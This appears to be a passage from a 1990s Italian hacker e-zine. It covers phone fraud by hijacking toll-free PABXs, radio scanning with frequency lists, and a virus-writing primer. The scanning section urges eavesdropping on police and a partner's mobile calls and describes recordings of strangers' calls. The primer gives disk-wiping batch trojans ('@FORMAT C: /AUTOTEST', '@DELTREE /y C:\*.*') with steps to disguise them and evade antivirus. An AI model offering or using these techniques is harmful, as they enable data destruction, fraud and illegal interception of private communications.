comunque resta il fatto che molta gente che e' stata arrestata per blue boxing e' stata scoperta attraverso un controllo della lunghezza delle chiamate fatte ai numeri verdi e con un successivo controllo sulla linea telefonica della presenza di toni particolari emulati da parte dell'utente (tipo il 2600 hz). COME E' POSSIBILE TELEFONARE GRATIS OGGI? Bene non c'e' un modo puro per farlo, con i telefoni pubblici anni fa bastava attaccare il nastro adesivo sulla tessera telefonica, ora se volete prendervela con una cabina telefonica dovete almeno avere accesso ai fili. A parte questo cominciate a rinunciare ai trunk e concentratevi sull'hacking di qualche PABX sui toll free, una volta che ne avete il controllo potete far pagare a loro le chiamate, comunque non e' cosi' facile. Gran parte del phreaking si basa ora sulle carte di credito telefoniche oppure sul brutal forcing e non intendo soltanto dei codici, ma anche delle apparecchiature ;) pIGpEN ͻ PHREAKiNG RADi0ASC0LT0 PER VERi ASC0LT0Ni ͼ Hy fratelli, e' venuto il momento di accendere la radio e sentire cosa accade nel mondo...hey cosa avete capito, non quella radio, ma il vostro fidato scanner!! ? No non quello da tavolo del picci, quello radio che avete appena comprato dal vostro negozio di sfiducia. Si perche' se non l'avete capito i media ci consentono di sentire solo una minima parte di tutto quello che viene effettivamente trasmesso via etere. Non potete immaginare quante siano le cose che tv, radio(normale) e giornali ci tengono nascoste. Come ogni giorno,ogni notte accadano un mare di cose che per i piu' non esistono. Questa e' una terribile restrizione della nostra liberta', e s'impone di far qualche cosa. Avete mai desiderao sapere cosa dice per radio il pulotto che ci sta facendo una multa da guinness? O sapere cosa dice la propria ragazza al telefonino e se e' vero che telefona all'amica (hehe)? Ebbene e' giunto il momento di svelare la verita' !! Esistono sul mercato (nero o meno che sia) delle radioline particolari, grandi circa come un normale cellulare (i portatili), che ci permettono di fare giusto qualcosina di piu' del solito, questi sono i mitici Scanners (ehm..non gli ultracorpi). Un modello veramente buono e facilmente reperibile in Italia dal mafioso vicino casa e' l'UNIDEN BEARCAT twin turbo 200. Questo modello e' un portatile che si mimetizza facilmente come cellulare, ha ben 200 frequenze memorizzabili ed un costo abbastanza contenuto (~ 500.000 ). Ovviamente consiglio uno scanner perche' e' l'unico che permetta di sintonizzarsi su QUALUNQUE frequenza. A questo punto che cosa vi manca? Ma le frequenze ovviamente! Premetto che in Italia le frequenze sono abbastanza incasinate (cosa non lo e'), nel senso che da un comune all'altro aumentano, diminuiscono, cambiano, un vero e proprio bordello.... Comunque in linea generale sono cosi' suddivise: 066-088 Mhz Steps 5 Khz Mode NFM -* VHF Low Band *- 108-137 Mhz Steps 12.5 Khz Mode AM -* Aircraft Band *- 137-144 Mhz Steps 5 Khz Mode NFM -* Military Land *- 144-148 Mhz Steps 5 Khz Mode NFM -* 2m Amateur Band *- 148-174 Mhz Steps 5 Khz Mode NFM -* VHF High Band *- 406-420 Mhz Steps 12.5 Khz Mode NFM -* Federal Gov. *- 420-450 Mhz Steps 12.5 Khz Mode NFM -* 70cm Amat. Band *- 450-470 Mhz Steps 12.5 Khz Mode NFM -* UHF Stndr. Band *- 470-512 Mhz Steps 12.5 Khz Mode NFM -* UHF (T) Band *- 806-956 Mhz Steps 12.5 Khz Mode NFM -* Cell. Band *- A scopo dimostrativo seguono alcune frequenze moolto interessanti, che sono certo non vi sognereste mai di ascoltare senza permesso scritto delle autorita' competenti. Sempre a scopo di esempio troverete allegati a questo articolo alcuni file sonori che vi daranno un'idea di cosa si puo' sentire con un poco di pazienza...ehm ******************************************************************************* FREQUENZE DEI TUTORI DEL DISORDINE PUBBLICO ( PULOTT ) ******************************************************************************* 77.8250 77.1500 415.9000 416.0500 426.0500 425.9000 77.1000 78.5250 78.0000 425.0000 426.1250 426.2750 426.7750 162.3500 trasmissioni dati 124.8000 aeronautica 145.6250 162.3750 162.6600 164.8000 trasmissioni dati 124.4500 aeronautica 87.9000 83.1250 83.1300 439.1625 68.1850 ******************************************************************************* FREQUENZE DEL CELLULARE DELLA VOSTRA RAGAZZA (o del suo ragazzo hehe) ******************************************************************************* 74.7300 74.2550 810.5500 811.3125 812.3500 812.6000 813.6375 822.9750 821.6250 823.8750 824.3250 824.7500 825.2250 825.6750 826.1250 827.0250 827.4750 828.3750 828.8000 829.0625 829.3125 829.8375 830.3500 831.1125 831.6375 831.8875 806.2625 808.9625 809.4125 811.5750 813.3750 824.7750 74.4050 811.2500 811.4125 806.6625 806.6750 808.5125 808.9125 809.1500 809.5000 811.4875 811.7500 812.0875 823.4250 827.9250 806.8250 806.9000 808.5500 810.3750 810.6375 810.7125 810.7250 811.0625 811.8375 812.5000 812.8625 823.5125 823.7625 825.1875 826.5750 829.5750 830.0875 811.4250 811.8000 807.1625 810.8875 812.1750 836.0875 808.0625 823.8500 807.6125 809.8625 818.2125 811.7250 ------------------------------------------------------------------------------- MP3 CHE PASSIONE !! ------------------------------------------------------------------------------- Nel file radio01.zip trovate allegati a questo articoletto alcuni mp3 moolto interessanti.. Sono degli esempi sulle possibilit che il radioscanning offre. cell!!s.mp3 E' un piccolo mix di varie telefonate prese a caso da vari cellulari. (Se per caso tra voi c' uno degli "intervistati" non si scandalizzi..il mondo lo ascolta ^_^ telec!!s.mp3 E' uno dei tanti messaggi automatici di Telecom Italia Mobile, In particolare vi avvisa che l'utente chiamato non raggiungibile. telec2!!s.mp3 Avete presente il nuovo tacs ricaricabile? Bene questo quello che sentirete...nel controllare il vostro credito residuo...ma potete pure chiedere a me!! HAHA telec3!!s.mp3 Ma gli addetti Telecom non ci sono proprio mai...tranne che per farvi pagare la bolletta ovviamente ! =============================================================================== TELEPHONE-RELATED FREQUENCIES ------------------------------------------------------------------------------- TELEPHONE FREQUENCY BANDS - BY FREQUENCY ------------------------------------------------------------------------------- 35.22 - 35.66 RADIO PAGING 43.22 - 43.64 RADIO PAGING 46.61 - 46.97 CORDLESS TELEPHONES 49.67 - 49.97 WIRELESS ROOM/BABY MONITORS 145.10 - 145.50 HAM AUTOPATCH 146.61 - 147.39 HAM AUTOPATCH 152.03 - 152.21 RCC ~& RADIO PAGING 152.48 - 152.825 IMTS TELEPHONE/CANADA 152.51 - 152.81 IMTS TELEPHONE ~& RADIO PAGING 157.74 - 158.10 RADIO PAGING 158.49 - 158.70 RADIO PAGING 158.91 - 161.565 RAILROADS/CANADA 160.215 - 161.565 RAILROADS/USA 161.80 - 162.025 MARINE OPERATOR SHIP/SHORE 223.85 - 224.98 HAM AUTOPATCH 442.00 - 445.00 HAM AUTOPATCH 447.00 - 450.00 HAM AUTOPATCH 451.175 - 451.6875 TELEPHONE REPAIR 454.025 - 454.35 RCC~ RADIO PAGING 454.40 - 454.65 IMTS TELEPHONE ~& RADIO PAGING 454.70 - 454.975 TELCO AIR/GROUND OPERATORS 459.025 - 459.65 RADIO PAGING 459.70 - 459.975 TELCO AIR/GROUND AIRCRAFT 479.025 - 493.00 OFFSHORE OIL PLATFORMS 861.0125 - 865.2375 BASIC EXCHANGE RADIO SERVICE 869.00 - 894.00 CELLULAR PHONES 902.00 - 928.00 900 MHZ CORDLESS PHONES 929.00 - 932.00 RADIO PAGING ------------------------------------------------------------------------------- TELEPHONE FREQUENCY BANDS - BY SERVICE ------------------------------------------------------------------------------- 902.00 - 928.00 900 MHZ CORDLESS PHONES 861.0125 - 865.2375 BASIC EXCHANGE RADIO SERVICE 869.00 - 894.00 CELLULAR PHONES 46.61 - 46.97 CORDLESS TELEPHONES 145.10 - 145.50 HAM AUTOPATCH 146.61 - 147.39 HAM AUTOPATCH 223.85 - 224.98 HAM AUTOPATCH 442.00 - 445.00 HAM AUTOPATCH 447.00 - 450.00 HAM AUTOPATCH 152.48 - 152.825 IMTS TELEPHONE/CANADA 152.51 - 152.81 IMTS TELEPHONE ~& RADIO PAGING 454.40 - 454.65 IMTS TELEPHONE ~& RADIO PAGING 161.80 - 162.025 MARINE OPERATOR SHIP/SHORE 479.025 - 493.00 OFFSHORE OIL PLATFORMS 35.22 - 35.66 RADIO PAGING 43.22 - 43.64 RADIO PAGING 157.74 - 158.10 RADIO PAGING 158.49 - 158.70 RADIO PAGING 459.025 - 459.65 RADIO PAGING 929.00 - 932.00 RADIO PAGING 158.91 - 161.565 RAILROADS/CANADA 160.215 - 161.565 RAILROADS/USA 152.03 - 152.21 RCC ~& RADIO PAGING 454.025 - 454.35 RCC~ & RADIO PAGING 454.70 - 454.975 TELCO AIR/GROUND OPERATORS 459.70 - 459.975 TELCO AIR/GROUND AIRCRAFT 451.175 - 451.6875 TELEPHONE REPAIR 49.67 - 49.97 WIRELESS ROOM/BABY MONITORS ------------------------------------------------------------------------------- 900 MHZ CORDLESS TELEPHONE FREQUENCIES - (AFTER MID-1992) - 902 - 928 MHZ NFM ------------------------------------------------------------------------------- 902.000 - 928.000 900 MHZ CORDLESS TELEPHONES (60-100 KHZ SPACING) PANASONIC KX-T9000 (30 CHANNELS) 902.1 - 903.9 TRANSPONDER (BASE) FREQUENCIES (60 KHZ SPACING) 926.1 - 927.9 HANDSET FREQUENCIES FIRST CHANNEL 902.1 DEFAULT TRANSPONDER FREQUENCY 926.1 HANDSET FREQUENCY (24 MHZ HIGHER) CH BASE HANDSET CH BASE HANDSET -- ------- ------- -- ------- ------- 01 902.100 926.100 08 902.310 926.310 02 902.130 926.130 09 902.340 926.340 03 902.160 926.160 10 902.370 926.370 04 902.190 926.190 11 902.400 926.400 05 902.220 926.220 ^ ^ ^ 06 902.250 926.250 ^ ^ ^ 07 902.280 926.280 59 903.870 927.870 V-TECH TROPEZ DX900 (20 CHANNELS) 905.6 - 907.5 TRANSPONDER (BASE) FREQUENCIES (100 KHZ SPACING) 925.5 - 927.4 HANDSET FREQUENCIES ONE SUCH CHANNEL 906.375 DEFAULT TRANSPONDER FREQUENCY 926.275 HANDSET FREQUENCY OTHER 900 MHZ CORDLESS PHONES AT&T #9120 - 902-905 & 925-928 MHZ OTRON CORP. #CP-1000 - 902.1-903.9 & 926.1-927.9 MHZ SAMSUNG #SP-R912- 903 & 927 MHZ ------------------------------------------------------------------------------- CELLULAR TELEPHONE FREQUENCIES BANDS ------------------------------------------------------------------------------- 824.0000 - 834.2600 NON-WIRELINE COS. (RADIO COMMON CARRIERS) MOBILES 845.0000 - 846.5000 NON-WIRELINE COS. (RADIO COMMON CARRIERS) MOBILES 869.0000 - 879.3600 NON-WIRELINE COS. (RADIO COMMON CARRIERS) BASES 890.0000 - 891.5000 NON-WIRELINE COS. (RADIO COMMON CARRIERS) BASES 835.6500 - 845.0000 WIRELINE COS. (LOCAL TELEPHONE COMPANY) MOBILES 846.5000 - 849.0000 WIRELINE COS. (LOCAL TELEPHONE COMPANY) MOBILES 880.6500 - 890.0000 WIRELINE COS. (LOCAL TELEPHONE COMPANY) MOBILES ? 891.5000 - 894.0000 WIRELINE COS. (LOCAL TELEPHONE COMPANY) MOBILES ? 829.000 - 849.000 CELLULAR TRANS. FREQUENCY RANGE (30 KHZ) 869.000 - 894.000 CELLULAR RECV. FREQUENCY RANGE (PAIRED FREQS) 869.0000 - 880.0000 SYSTEM A - NON WIRELINE TELEPHONE FREQUENCIES 880.0000 - 894.0000 SYSTEM B - WIRELINE TELEPHONE FREQUENCIES ------------------------------------------------------------------------------- CELLULAR TELEPHONE FREQUENCIES ------------------------------------------------------------------------------- Base Mobile Base Mobile ~Transmit Transmit~ Transmit~ Transmit Channel Frequency Frequency Channel Frequency Frequency Number (MHz) (MHz) ~ Number (MHz) (MHz) ~ 1 870.0300 825.0300 30 870.9000 825.9000 2 870.0600 825.0600 31 870.9300 825.9300 3 870.0900 825.0900 32 870.9600 825.9600 4 870.1200 825.1200 33 870.9900 825.9900 5 870.1500 825.1500 34 871.0200 826.0200 6 870.1800 825.1800 35 871.0500 826.0500 7 870.2100 825.2100 36 871.0800 826.0800 8 870.2400 825.2400 37 871.1100 826.1100 9 870.2700 825.2700 38 871.1400 826.1400 10 870.3000 825.3000 39 871.1700 826.1700 11 870.3300 825.3300 40 871.2000 826.2000 12 870.3600 825.3600 41 871.2300 826.2300 13 870.3900 825.3900 42 871.2600 826.2600 14 870.4200 825.4200 43 871.2900 826.2900 15 870.4500 825.4500 44 871.3200 826.3200 16 870.4800 825.4800 45 871.3500 826.3500 17 870.5100 825.5100 46 871.3800 826.3800 18 870.5400 825.5400 47 871.4100 826.4100 19 870.5700 825.5700 48 871.4400 826.4400 20 870.6000 825.6000 49 871.4700 826.4700 21 870.6300 825.6300 50 871.5000 826.5000 22 870.6600 825.6600 51 871.5300 826.5300 23 870.6900 825.6900 52 871.5600 826.5600 24 870.7200 825.7200 53 871.5900 826.5900 25 870.7500 825.7500 54 871-6200 826-6200 26 870.7800 825.7800 55 871 6500 826.6500 27 870.8100 825.8100 56 871.6800 826.6800 28 870.8400 825.8400 57 871.7100 826.7100 29 870.8700 825.8700 58 871.7400 826.7400 59 871.7700 826.7700 111 873.3300 828.3300 60 871.8000 826.8000 112 873.3600 828.3600 61 871.8300 826.8300 113 873.3900 828.3900 62 871.8600 826.8600 114 873.4200 828.4200 63 871.8900 826.8900 115 873.4500 828.4500 64 871.9200 826.9200 116 873.4800 828.4800 65 871.9500 826.9500 117 873.5100 828.5100 66 871.9800 826.9800 118 873.5400 828.5400 67 872.0100 827.0100 119 873.5700 828.5700 68 872.0400 827.0400 120 873.6000 828.6000 69 872.0700 827.0700 121 873.6300 828.6300 70 872.1000 827.1000 122 873.6600 828.6600 71 872.1300 827.1300 123 873.6900 828.6900 72 872.1600 827.1600 124 873.7200 828.7200 73 872.1900 827.1900 125 873.7500 828.7500 74 872.2200 827.2200 126 873.7800 828.7800 75 872.2500 827.2500 127 873.8100 828.8100 76 872.2800 827.2800 128 873.8400 828.8400 77 872.3100 827.3100 129 873.8700 828.8700 78 872.3400 827.3400 130 873.9000 828.9000 79 872.3700 827.3700 131 873.9300 828.9300 80 872.4000 827.4000 132 873.9600 828.9600 81 872.4300 827.4300 133 873.9900 828.9900 82 872.4600 827.4600 134 874.0200 829.0200 83 872.4900 827.4900 135 874.0500 829.0500 84 872.5200 827.5200 136 874.0800 829.0800 85 872.5500 827.5500 137 874.1100 829.1100 86 872.5800 827.5800 138 874.1400 829.1400 87 872.6100 827.6100 139 874.1700 829.1700 88 872.6400 827.6400 140 874.2000 829.2000 89 872.6700 827.6700 141 874.2300 829.2300 90 872.7000 827.7000 142 874.2600 829.2600 91 872.7300 827.7300 143 874.2900 829.2900 92 872.7600 827.7600 144 874.3200 829.3200 93 872.7900 827.7900 145 874.3500 829.3500 94 872.8200 827.8200 146 874.3800 829.3800 95 872.8500 827.8500 147 874.4100 829.4100 96 872.8800 827.8800 148 874.4400 829.4400 97 872.9100 827.9100 149 874.4700 829.4700 98 872.9400 827.9400 150 874.5000 829.5000 99 872.9700 827.9700 151 874.5300 829.5300 100 873.0000 828.0000 152 874.5600 829.5600 101 873.0300 828.0300 153 874.5900 829.5900 102 873.0600 828.0600 154 874.6200 829.6200 103 873.0900 828.0900 155 874.6500 829.6500 104 873.1200 828.1200 156 874.6800 829.6800 l05 873.1500 828.1500 157 874.7100 829.7100 106 873.1800 828.1800 158 874.7400 829.7400 107 873.2100 828.2100 159 874.7700 829.7700 108 873.2400 828.2400 160 874.8000 829.8000 109 873.2700 828.2700 161 874.8300 829.8300 110 873.3000 828.3000 162 874.8600 829.8600 163 874.8900 829.8900 215 876.4500 831.4500 164 874.9200 829.9200 216 876.4800 831.4800 165 874.9500 829.9500 217 876.5100 831.5100 166 874.9800 829.9800 218 876.5400 831.5400 167 875.0100 830.0100 219 876.5700 831.5700 168 875.0400 830.0400 220 876.6000 831.6000 169 875.0700 830.0700 221 876.6300 831.6300 170 875.1000 830.1000 222 876.6600 831.6600 171 875.1300 830.1300 223 876.6900 831.6900 172 875.1600 830.1600 224 876.7200 831.7200 173 875.1900 830.1900 225 876.7500 831.7500 174 875.2200 830.2200 226 876.7800 831.7800 175 875.2500 830.2500 227 876.8100 831.8100 176 875.2800 830.2800 228 876.8400 831.8400 177 875.3100 830.3100 229 876.8700 831.8700 178 875.3400 830.3400 230 876.9000 831.9000 179 875.3700 830.3700 231 876.9300 831.9300 180 875.4000 830.4000 232 876.9600 831.9600 181 875.4300 830.4300 233 876.9900 831.9900 182 875.4600 830.4600 234 877.0200 832.0200 183 875.4900 830.4900 235 877.0500 832.0500 184 875.5200 830.5200 236 877.0800 832.0800 185 875.5500 830.5500 237 877.1100 832.1100 186 875.5800 830.5800 238 877.1400 832.1400 187 875.6100 830.6100 239 877.1700 832.1700 188 875.6400 830.6400 240 877.2000 832.2000 189 875.6700 830.6700 241 877.2300 832.2300 190 875.7000 830.7000 242 877.2600 832.2600 191 875.7300 830.7300 243 877.2900 832.2900 192 875.7600 830.7600 244 877.3200 832.3200 193 875.7900 830.7900 245 877.3500 832.3500 194 875.8200 830.8200 246 877.3800 832.3800 195 875.8500 830.8500 247 877.4100 832.4100 196 875.8800 830.8800 248 877.4400 832.4400 197 875.9100 830.9100 249 877.4700 832.4700 198 875.9400 830.9400 250 877.5000 832.5000 199 875.9700 830.9700 251 877.5300 832.5300 200 876.0000 831.0000 252 877.5600 832.5600 201 876.0300 831.0300 253 877.5900 832.5900 202 876.0600 831.0600 254 877.6200 832.6200 203 876.0900 831.0900 255 877.6500 832.6500 204 876.1200 831.1200 256 877.6800 832.6800 205 876.1500 831.1500 257 877.7100 832.7100 206 876.1800 831.1800 258 877.7400 832.7400 207 876.2100 831.2100 259 877.7700 832.7700 208 876.2400 831.2400 260 877.8000 832.8000 209 876.2700 831.2700 261 877.8300 832.8300 210 876.3000 831.3000 262 877.8600 832.8600 211 876.3300 831.3300 263 877.8900 832.8900 212 876.3600 831.3600 264 877.9200 832.9200 213 876.3900 831.3900 265 877.9500 832.9500 214 876.4200 831.4200 266 877.9800 832.9800 267 878.0100 833.0100 319 879.5700 834.5700 268 878.0400 833.0400 320 879.6000 834.6000 269 878.0700 833.0700 321 879.6300 834.6300 270 878.1000 833.1000 322 879.6600 834.6600 271 878.1300 833.1300 323 879.6900 834.6900 272 878.1600 833.1600 324 879.7200 834.7200 273 878.1900 833.1900 325 879.7500 834.7500 274 878.2200 833.2200 326 879.7800 834.7800 275 878.2500 833.2500 327 879.8100 834.8100 276 878.2800 833.2800 328 879.8400 834.8400 277 878.3100 833.3100 329 879.8700 834.8700 278 878.3400 833.3400 330 879.9000 834.9000 279 878.3700 833.3700 331 879.9300 834.9300 280 878.4000 833.4000 332 879.9600 834.9600 281 878.4300 833.4300 333 879.9900 834.9900 282 878.4600 833.4600 334 880.0200 835.0200 283 878.4900 833.4900 335 880.0500 835.0500 284 878.5200 833.5200 336 880.0800 835.0800 285 878.5500 833.5500 337 880.1100 835.1100 286 878.5800 833.5800 338 880.1400 835.1400 287 878.6100 833.6100 339 880.1700 835.1700 288 878.6400 833.6400 340 880.2000 835.2000 289 878.6700 833.6700 341 880.2300 835.2300 290 878.7000 833.7000 342 880.2600 835.2600 291 878.7300 833.7300 343 880.2900 835.2900 292 878.7600 833.7600 344 880.3200 835.3200 293 878.7900 833.7900 345 880.3500 835.3500 294 878.8200 833.8200 346 880.3800 835.3800 295 878.8500 833.8500 347 880.4100 835.4100 ------------------------------------------------------------------------------- Per il momento e' tutto signori, eventuali domande non fatele a me perche' io non ho detto niente, non so niente e soprattutto non c'ero, e se c'ero dormivo OK ?? ------------------------------------------------------------------------------- Vanadio ͻ ViRii ViR0PEDiA v1.0 ͼ Teoria & Tecnica della Programmazione Virale I-II parte INTRODUZIONE Cos' un virus informatico? Analogamente ai virus biologici, un parassita informatico un organismo capace di replicarsi tramite portatori sani e capace di causare malfunzionamenti al sistema. E' ovvio che nel paragone con la parola organismo si vuole intendere un blocco di codice, di istruzioni, fondalmentalmente un virus informatico solo un programmma, diverso da quelli normali, magari anche un po' intelligente, ma sempre un programma. Gli studi condotti sui virus informatici finora hanno classificato e ripartito i parassiti in diverse specie: la prima differenza a livello generale, la seconda classificazione invece pi specifica (riguarda il codice e le funzioni proprie del virus stesso). I CLASSIFICAZIONE - trojan horse (=cavallo di troia) - virus - worm (=verme) TROJAN HORSE Un trojan horse non propriamente un virus, ma un programma distruttivo pronto a esplodere. Con questo si vuole intendere che mentre lo scopo del virus cercare di restare nascosto il pi possibile e replicarsi, lo scopo del cavallo di troia danneggiare esplicitamente un sistema. Sono chiamati trojan horse perch di solito vengono distribuiti sotto false spoglie, magari fingendo di essere programmi ambiti o molto ricercati dall'utenza. Famosi trojan horse furono quelli che reclamavano il PKZIP300B. Alcuni esempi pratici? I BAT-trojan horse sono i pi semplici e efficaci da costruire, usando un qualsiasi editor di testo: C:\>EDIT TROJAN1.BAT @FORMAT C: /AUTOTEST C:\>EDIT TROJAN2.BAT @DELTREE /y C:\*.* Il carattere "@" serve a nascondere l'echo su schermo del comando (altrimenti l'utente si accorgerebbe subito di cosa succede). Nel primo caso viene utilizzata una piccola backdoor del comando FORMAT, precisamente il parametro /AUTOTEST. Di solito l'esecuzione di questo comando a rischio chiede sempre all'utente di ripensarci, prima di avviare la formattazione. C:\>FORMAT C: ATTENZIONE: TUTTI I DATI SUL DISCO FISSO C: ANDRANNO PERSI Continuare con la formattazione (S/N)? Tuttavia usando /AUTOTEST questa richiesta non viene effettuata e parte direttamente la formattazione del disco (non si sa perch la Microsoft abbia lasciato questo strano parametro). Stessa cosa per il comando DELTREE, che combinato con l'opzione /y rimuove tutti i files e tutte le cartelle dal disco C. Varianti simili si possono ottenere con il normale comando DEL del DOS. Per rendere uno di questi trojan horse pi infido e intercettabile dall'utente ignaro potete procedere come segue: - create il file BAT col trojan senza usare il comando @ - usate una utility tipo BAT2COM per convertire il file BAT in un eseguibile COM - per rendere la dimensione del trojan pi grande (quindi pi credibile) usate COPY /B trojan.com + command.com final.com - comprimete il file FINAL.COM usando PKLITE.COM oppure DIET, ICE In questo modo sar veramente difficile rilevare il trojan nel file, anche per un antivirus. Rientrano nella categoria anche le Logic Bomb (=bombe logiche) che sono dei particolari trojan attivati da un evento temporale o dal verificarsi di una certa condizione. WORM Concetto pi avanzato di virus, si pu definire come un virus che viaggia e si riproduce lungo le reti. Il pi famoso nella storia quello di Robert Morris jr., giovane americano che negli anni '80 riusc a mandare in tilt migliaia di computer a causa di una replicazione incontrollata del suo verme, che sfruttava un vecchio bug del sendmail. Oggi non esistono ancora worm perfezionati a tal punto da propagarsi cos rapidamente, questo anche a causa dei numerosi e diversi sistemi presenti su Internet, ma tuttavia Unix/Linux e Java sembrano terreno fertile per lo sviluppo dei worm. VIRUS Ecco l'argomento principale di cui ci occuperemo. I virus, studiati ormai da anni, sono classificati in modo specifico in base al funzionamento. II CLASSIFICAZIONE I- FLOPPY BOOT e MBR VIRUS Infettano un particolare settore dei dischi, quello iniziale, di avvio. Nei dischetti tale settore contiene il codice che visualizza il famoso messaggio: "Disco non di avvio / Sostituire il disco e premere un tasto". Nel disco rigido invece si parla di Master Boot Record (=record di avviamento principale) meglio conosciuto come MBR. Furono i primi virus ad essere creati e a diffondersi rapidamente, oggi in fase di estizione a causa dell'accesso 32-bit di Windows 95 ai dischi. Virus famosi: Form, PingPong, Stoned, AntiEXE, NYB-B1, DiskKiller, Michelangelo II- DOS-EXEC FILE VIRUS Stragrande maggioranza di virus, capaci di infettare i files eseguibili del sistema operativo. I loro bersagli preferiti sono i file COM e EXE del DOS. Rientrano in questa categoria anche alcuni virus che infettano i normali file BAT, facilmente scopribili. Oggi in via di estinzione. Virus famosi: November 17, Jerusalem, Ontario, Vienna III- WIN-EXEC FILE VIRUS Nuovi virus, che possono infettare diversi tipi di oggetti: NE-EXE NewExecutable File EXE per Windows 3.1 16-bit SCR ScreenSaver File SCR per Windows 3.1 16-bit PE-EXE PortableExecutable File EXE per Windows 95 32-bit VXD Device Driver File VXD per Windows 95 32-bit Esistono solo una quindicina di virus di questo tipo, ancora non tanto perfezionati. IV- MACRO VIRUS La moda del momento, ovvero i virus scritti in VBA (Visual Basic for Application). Sono virus multipiattaforma (possono funzionare sia su sistemi Windows che su Macintosh) in quanto non dipendono dal sistema operativo ma da una particolare applicazione che consente l'uso di macro, cio di comandi automatici. Ecco i programmi suscettibili a questo tipo di infezione: MS-WORD 6.0 - 95 - 97 File di tipo DOC MS-EXCEL 5.0 - 95 - 97 File di tipo XLS LOTUS AMIPRO File di tipo SAM, SMM esiste poi una categoria di applicazioni "a rischio" ancora in fase di sperimentazione (Lotus 1-2-3) e in genere tutte le applicazioni che permettono l'uso di macro. Virus famosi: Concept, Wazzu, Laroux, Alliance V- MULTIPARTITO Quando un virus riesce ad infettare diversi oggetti di quelli sopra elencati, si definisce multipartito. Esempi: Flip.2153 MBR + DOS-EXEC Junkie.1027 FLOPPY + MBR + DOS-EXEC Win.Apparition WIN-EXEC + MACRO Win.Ph33r DOS-EXEC + WIN-EXEC Esiste infine un'ultima suddivisione, fatta in base alla tipologia di virus, cio guardando proprio le funzioni e il codice interno del programma-virus. III CLASSIFICAZIONE I- Virus COMPANION Virus elementari, molto facili da rimuovere che sfruttano un buco offerto dal DOS. Sotto DOS esiste una grossa ambiguit quando si verifica una condizione simile: una directory contiene 2 files (PIPPO.COM e PIPPO.EXE), lanciando il comando "C:\>PIPPO" senza specificare null'altro, quale dei due files sar caricato prima? Ebbene il sistema Microsoft carica sempre prima i file COM quando viene specificata l'estensione, per cui facile intuire come si comportano i virus Companion: - cerca un file .EXE nella directory - crea un secondo file, con lo stesso identico nome ma con estensione .COM - nascondi il file .COM per ingannare l'utente (ATTRIB +H) Quando l'utente digita "PIPPO", crede di aver caricato "PIPPO.EXE", quando in realt non sa che stato avviato il virus conenuto in "PIPPO.COM" che di certo avr infettato un altro file. II- Virus AZIONE DIRETTA Si chiamano cos perch agiscono direttamente infettando i files delle directory. Ogni volta che un programma infetto viene eseguito, il virus esegue una scansione dei files presenti nella directory corrente (o in altre directory predefinite come C:\DOS, C:\, C:\WINDOWS) alla ricerca di possibili "vittime". Una volta trovato un "ospite", il virus lo contagia e quindi passa ad eseguire il programma originale per non destare i sospetti dell'utente. III- Virus TSR Categoria gi pi complessa di virus, in quanto riesce a rimanere attiva, di nascosto, all'interno del sistema operativo, sostituendo parti di esso. I virus TSR (Terminate and Stay Resident) riservano una porzione di memoria per s stessi (solitamente memoria alta) o sfruttano dei buchi di RAM non usati dal DOS dove potersi copiare, quindi acquistano una priorit maggiore rispetto al sistema operativo stesso per alcune operazioni "a rischio" come apertura di un file, esecuzione di un file, rename, attrib, accesso a un dischetto, ecc. Ognuna di queste operazioni pu essere intercettata dal parassita che prima di eseguire la vera procedura, infetta l'oggetto in uso (file o dischetto). IV- Virus STEALTH Quando un virus attivo in memoria, pu interferire col sistema operativo e pu farlo anche bene. La simbiosi pu essere tale che il parassita prende il controllo totale su alcune funzioni base del DOS. Tra le cose che un virus pu fare ovviamente rientra la capacit di far apparire tutto normale, cio nascondere tutti i sintomi e i segnali di allarme che possano farlo individuare. Questa tecnica detta "stealth" ed esistono varianti notevoli di questo furbo stratagemma: SIZE HIDING Se un virus X lungo 100 bytes, tutti i files infetti avranno la loro dimensione aumentata di 100. Un virus pu intercettare il comando "DIR" e sottrarre il valore 100 alla dimensione dei file infetti, facendoli sembrare non infetti all'output del comando. MBR STEALTH Un virus che infetta l'MBR, salva una copia del vecchio master boot record prima di sostituirlo con il codice virale. Quando un antivirus va a leggere l'MBR, il parassita intercetta la lettura e restituisce la copia originale salvata, mascherando l'infezione presente. CLEAN ON-THE-FLY Il virus pu intercettare tutte le operazioni di lettura sui files e modificarne l'output. Se ad esempio un programma prova a leggere un file infetto, il virus, attivo in memoria, intercetta l'operazione e ripulisce il file prima della lettura, rendendolo trasparente al controllo. Una volta finita l'operazione, il virus re-infetta il file. E' questo uno dei metodi pi efficaci, che riesce ad annullare anche i controlli tramite CRC-checksum. V- Virus ENCRYPTED (=cifrati) Un virus un programma come tanti altri, quindi formato da righe di codice. Ogni virus viene infatti identificato dall'antivirus attraverso una particolare sequenza di istruzioni in linguaggio macchina (stringa) che propria di ogni parassita. Questa stringa non altro che una serie di bytes, ognuno dei quali corrisponde ad una istruzione assembler o a un testo particolare racchiuso nel virus. Ad esempio in tutti i files infetti dal virus Tai-Pan.438 possibile leggere questa stringa "[Whisper presenterar Tai-Pan]", il che rende il virus facilmente identificabile. Meglio ancora l'identificazione tramite il codice vero e proprio del virus: tutti i files infetti dal virus Tai-Pan.438 infatti presentano queste istruzioni: Bytes Codice Macchina E80000 CALL xxxx 5E POP SI 83EE03 SUB SI,+03 B8CE7B MOV AX,7BCE CD21 INT 21 3DCE7B CMP AX,7BCE 7517 JNZ yyyy 0E PUSH CS 1F POP DS dove "xxxx" e "yyyy" sono valori generici che cambiano per ogni file. Quindi il virus Tai-Pan riconoscibile ricercando questa stringa esadecimale "E800005E83EE03B8CE7BCD213DCE7B75170E1F". Per ovviare questo riconoscimento ed essere meno riconoscibili i virus ricorrono alla cifratura del codice (encryption). Il codice cio si presenta in questo modo: VIRUS NON CIFRATO VIRUS CIFRATO 1: istr1 0: DECIFRATORE 2: istr2 1: istrX 3: istr3 2: istrY 4: __.. 3: istrZ 5: "esempio" 4: ____. 5: "hqhrtac" Il virus non cifrato facilmente riconoscibile dalle istruzioni che lo compongono e anche dalla stringa di testo "esempio" presente al suo interno. Lo stesso virus, in forma cifrata, diventa irriconoscibile, poich ogni istruzione viene camuffata e trasformata in un'altra totalmente diversa di significato; cos anche il testo, diventa una stringa incomprensibile. Inoltre il sistema di cifratura utilizza una chiave (di solito 8/16-bit) che pu essere fissa ma anche variabile, cio mutevole ad ogni infezione. Questo significa che il corpo cifrato del virus varia per ogni file infetto. Ovviamente in capo al virus deve esserci un decifratore capace di riportare allo stato originale il codice del virus. Ecco ad esempio il motore cifrante dello Junkie.1027, presente sempre in testa al virus: Riga Bytes Istruzione 0001: BE8FE0 MOV SI,0008 